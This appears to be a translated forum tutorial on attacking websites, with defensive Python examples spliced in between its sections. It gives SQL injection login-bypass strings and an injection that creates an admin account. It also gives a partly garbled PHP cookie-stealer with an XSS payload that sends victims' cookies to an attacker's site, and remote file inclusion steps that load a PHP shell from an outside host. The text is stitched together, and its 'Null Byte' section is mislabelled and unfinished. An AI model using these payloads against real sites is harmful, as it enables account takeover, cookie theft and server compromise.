
Techniques for attacking a website.

I will divide this article into the following parts:


QUOTE
1> Researching the attack target.
2> a. SQL Injection - Login Bypass
b. SQL Injection - Retrieving table information
3> a. XSS - Cookie Stealer (stealing cookies)
b. JavaScript Injection
4> Remote File Inclusion
5> a. Null Byte - Picture Upload
b. Null Byte - CGI Exploitation
6> Summary.
1> Researching the attack target:
This is a very important first step that cannot be skipped when you want to attack a website. We need to use specialized tools to scan for information about the website, for example finding open ports and viewing information about the host.
First, find the open ports of the web host. You can use programs such as Super Scanner from Foundstone (an easy-to-use program), or the NMAP scanner, which most people consider the better scanner.
For any open port you find, see what type it is; we can learn about the directory configuration on the web host.
Look up other information as well, for example the domain's registrar, using whois websites such as:
CODE
http://whois.networksolutions.com/
CODE
http://www.dnsstuff.com/
You will get valuable information about the target website.
2> a. SQL Injection - Login Bypass:
The most basic and simplest form of SQL Injection is login bypass. On a website vulnerable to SQL Injection we can use the following string:
CODE
OR 1=1--
Enter it in the username and password fields of the login page, and we can "get past" the SQL query to obtain "privileges" on the vulnerable website.
Or you can also enter it in the website's URL. For example, call the website vulnerable to SQL Injection target.com:
CODE
www.target.com/index.php?id=0
We inject SQL as follows:
CODE
www.target.com/index.php?id=0 OR 1=1--
And we get a result similar to the step above. Here are a few injections that can be used:
CODE
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
hi or 1=1--
This is the simplest step of the SQL Injection technique; however, it sometimes produces no clear result on a given website.
CODE
http://www.sqlsecurity.com/ - General information about SQL Security/Injection
http://w3schools.com/sql/default.asp - Learn and study the SQL language
2> b. SQL Injection - Retrieving table information:
This is a more advanced technique for exploiting SQL Injection. It has 3 steps: first, we cause an error on the website vulnerable to SQL Injection in order to find table names (with the aim of creating a privileged account). Next, we cause another error to obtain the important table name. And finally we inject SQL to create an admin account.
To get the final result, first log in on the vulnerable website with the following username:
CODE
Having 1=1--
Leave the password empty and press Enter. We receive an (error) message containing a table name, similar to this:
SQL
Column user_member.user_id is invalid and was not found ....
(note that the part in purple text is the example table name). The error message may be longer, but the important thing we need is the table name; in the example above, user_member.id holds the username information. We carry out the next step to find other important table names:
SQL
UNION SELECT * FROM user_member WHERE USER_ID=admin GROUP BY
USER_ID HAVING 1=1;--
The error received may look like this:
QUOTE
Column user_member.user_id is invalid and was not found . Column
user_member.passwd is invalid and was not found
The new table obtained here is user_member.passwd, the table containing the password, so using the tables we have found we create an account with admin privileges:
SQL
INSERT INTO user_member (USER_NAME, LOGIN_ID, PASSWORD,
CREATION_DATE) VALUES(VetLuv,hacked,hacked,GETDATE();--
And now we can log in with admin rights using the username VetLuv and the password hacked.
The above is only the very basics of exploiting SQL Injection; hackers use SQL Injection to find tables containing important information such as credit cards, etc. You need to learn more and be more patient to achieve the desired result. If you have questions, you can post them here.
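Both SQL Injection parts above (login bypass and table enumeration) depend on form input being pasted into the SQL text and on database errors reaching the browser. The following is an added example, not code from the original article: it puts a concatenated login query beside a parameterized one that also returns a generic failure on database errors. The schema, the account and the function names are constructed for illustration; only the table name user_member and the column passwd are taken from the error messages quoted above.

```python
import hashlib
import hmac
import sqlite3

SALT = b"constructed-demo-salt"  # constructed; real systems use a random per-user salt

def pw_hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000).hex()

def make_db():
    # Constructed sample table, named after the one in the article's error message.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user_member (login_id TEXT PRIMARY KEY, passwd TEXT)")
    db.execute("INSERT INTO user_member VALUES (?, ?)",
               ("admin", pw_hash("correct horse")))
    return db

def login_concatenated(db, user, password):
    """The 'before' form: form input is pasted into the SQL text."""
    sql = ("SELECT login_id FROM user_member WHERE login_id = '" + user +
           "' AND passwd = '" + pw_hash(password) + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False

def login_parameterized(db, user, password):
    """The corrected form: input is bound as data and never parsed as SQL."""
    try:
        row = db.execute("SELECT passwd FROM user_member WHERE login_id = ?",
                         (user,)).fetchone()
    except sqlite3.Error:
        return False  # generic failure: no table or column names reach the client
    return row is not None and hmac.compare_digest(row[0], pw_hash(password))

# Two of the strings listed in the article, submitted as the username.
PAGE_STRINGS = ["admin'--", "' or 0=0 --"]

def compare():
    db = make_db()
    return [(s, login_concatenated(db, s, "x"), login_parameterized(db, s, "x"))
            for s in PAGE_STRINGS]

if __name__ == "__main__":
    for row in compare():
        print(row)
```

A database account for the web application that has no INSERT right on the user table also blocks the account-creation step described above, even if an injection point remains.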
3> a. XSS - Cookie Stealer (stealing cookies):
In this part we talk about XSS (or CSS), Cross Site Scripting: how code is placed on poorly secured guestbooks or forums to take cookies and store them after users log in. Cookies are used by most forums to confirm a user's identity, and there is only one cookie per user; once we obtain a user's cookie, we can begin to act as that user.
First, we use PHP to create the cookie-stealing script:
CODE
/*VNMagcCookeSteaer*/
/*Putthsupnyourhostng*/
cooke=_GET'cooke';
og=fopen("cookesVNM.txt","a");
fwrte(og,cooke."n");
fcose(og);
?>
Copy and save the code above as stealer.php.
Below is the content of the code:
HTML
cooke = _GET'cooke';
and do not forget one very important line:
HTML
og = fopen("cookesVNM.txt","a");
Create an empty text file named cookiesVNM.txt.
Upload the two files mentioned above to your host and do not forget to chmod the file cookiesVNM.txt to 666. With that you basically have the cookie-stealing script.
On a site vulnerable to XSS Injection, you can test by posting the following code in the parts of the site that allow posting:
HTML
<script>alert('Testing For XSS Hole')</script>
If you get an alert box reading Testing For XSS Hole, the site is definitely vulnerable.
And we can steal cookies by using the following code:
HTML
scrpt>
wndow.ocaton = 'http://yourste.com/steaer.php?cooke' document.cooke;
/scrpt>
This code redirects the member to the stealer.php page you created and stores the cookie in the file cookiesVNM.txt.
You can learn more about XSS in the article Hacking Guestbooks by GrL_Noob.
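The cookie theft described above needs two things: a guestbook or forum that writes posted text into the page unencoded, and a session cookie that page scripts can read. The following is an added example, not code from the original article, showing the two corresponding controls plus a small audit helper for Set-Cookie values; the cookie name sid and all function names are hypothetical.

```python
import html
from http.cookies import SimpleCookie

def render_entry(author, message):
    """Encode user-supplied guestbook text before it is placed in the page."""
    return "<p><b>{}</b>: {}</p>".format(
        html.escape(author, quote=True), html.escape(message, quote=True))

def session_cookie(session_id):
    """Build a Set-Cookie value that page scripts cannot read."""
    jar = SimpleCookie()
    jar["sid"] = session_id
    jar["sid"]["httponly"] = True   # hidden from document.cookie
    jar["sid"]["secure"] = True     # sent over HTTPS only
    jar["sid"]["samesite"] = "Lax"  # withheld from cross-site subrequests
    jar["sid"]["path"] = "/"
    return jar["sid"].OutputString()

def missing_cookie_flags(set_cookie_value):
    """Audit helper: which protective attributes does a Set-Cookie value lack?"""
    attrs = {part.strip().split("=", 1)[0].lower()
             for part in set_cookie_value.split(";")[1:]}
    return [flag for flag in ("httponly", "secure", "samesite")
            if flag not in attrs]

# Constructed inputs: the alert test from the article and a bare session cookie.
POSTED = "<script>alert('Testing For XSS Hole')</script>"
WEAK_COOKIE = "sid=abc123; Path=/"

if __name__ == "__main__":
    print(render_entry("guest", POSTED))
    print(session_cookie("abc123"))
    print(missing_cookie_flags(WEAK_COOKIE))
```

HttpOnly only keeps the cookie out of script reach; the output encoding is what stops the posted markup from running at all.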
4> Remote File Inclusion:
Remote File Inclusion (RFI for short) is a flaw found on quite a lot of websites today. It is also extremely simple to exploit, so in general it is quite common at the present time.
Exploiting Remote File Inclusion can be understood like this: when we place a file of ours (for example a file uploader or a PHP shell) into a web page, the web page's web server interprets and displays it according to our PHP script; at that point we easily have full control of the server.
More precisely, when a website displays another of its own pages, we modify the URL and put our PHP shell page in; the site "mistakes" it for the page to display, and so we have a PHP shell page right on that website's server.
Everyone can find vulnerable pages in their own way; within the scope of this article I will talk about using Google to search for vulnerable sites. We can search like this:
CODE
inurl:"index.php?page="
Google then returns pages that have "index.php?page=" in the URL, and a simple way to test whether a site is vulnerable is to add www.google.com after the = sign in the site's link:
CODE
www.site.com/index.php?page=www.google.com
If the entire Google page is displayed on that site, the site is definitely vulnerable. To exploit this we use a text file containing PHP shell code uploaded to our host and make the vulnerable site display it by changing the URL to add the link to where our shell file is stored.
Call the site victim, your PHP shell shell.txt, and the site hosting your link yoursite; we have the following:
CODE
http://victim/index.php?page=http://yoursite/shell.txt
Very simple, isn't it? For a PHP shell, VetLuv recommends remview:
CODE
http://php.spb.ru/remvew/remvew_2003_10_23.p
Otherwise, just use the one VN Magic has already uploaded at:
CODE
http://matrx2k.org/testsh.txt
That is, use VN Magic's PHP shell directly to save yourself the trouble of searching; just add the link above after the = sign of the vulnerable page and you can control that web server.
PS: If you want to practise right away to see it clearly, go to the article by Ounh Anh on practising an attack on a website. Have fun.
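The inclusion flaw described above exists because the value after page= is handed to the include call as a path or URL. The following is an added example, not code from the original article: it resolves the parameter through an allowlist and uses the same allowlist to flag inclusion attempts in access logs. The page names, file paths, function names and log lines are constructed.

```python
from urllib.parse import parse_qs, urlsplit

# Hypothetical page names and file paths; adapt to the real site layout.
ALLOWED_PAGES = {
    "home": "pages/home.php",
    "news": "pages/news.php",
    "contact": "pages/contact.php",
}

def resolve_page(value):
    """Return the local file for a ?page= value, or None if it is not allowlisted.

    The request value is only ever a dictionary key, so a URL, a path with
    "../" or a name carrying a NUL byte can never reach the include call.
    """
    return ALLOWED_PAGES.get(value)

def flag_include_attempts(log_lines, param="page"):
    """Return (client, value) for every request whose page value is not allowlisted."""
    hits = []
    for line in log_lines:
        parts = line.split('"')
        if len(parts) < 2 or len(parts[1].split()) < 2:
            continue  # not a request line we can parse
        client = line.split()[0]
        target = parts[1].split()[1]
        for value in parse_qs(urlsplit(target).query).get(param, []):
            if resolve_page(value) is None:
                hits.append((client, value))
    return hits

# Constructed access-log lines (combined log format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=news HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=www.google.com HTTP/1.1" 200 310',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=http://example.invalid/s.txt HTTP/1.1" 200 90',
    '203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?page=home%00.jpg HTTP/1.1" 200 45',
]

if __name__ == "__main__":
    for client, value in flag_include_attempts(SAMPLE_LOG):
        print(client, repr(value))
```

In PHP the same idea is an array lookup before `include`, with the `allow_url_include` setting left off so that a URL is never accepted as an include target.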
5> a. Null Byte - Picture Upload:
Specialized port-scanning tools:
Super Scanner 4.0
CODE
http://www.foundstone.com/index.htm?subnav=resources%2Fnavigation.htm&subcontent=%2Fresources%2Fproddesc%2Fsuperscan4.htm
This program works very well on Windows.
Nmap-4.21ALPHA4
CODE
http://insecure.org/
NMap is always considered the best scanning tool.
In addition there are other scanning tools such as Nessus (vulnerability scanner):
CODE
http://www.nessus.org/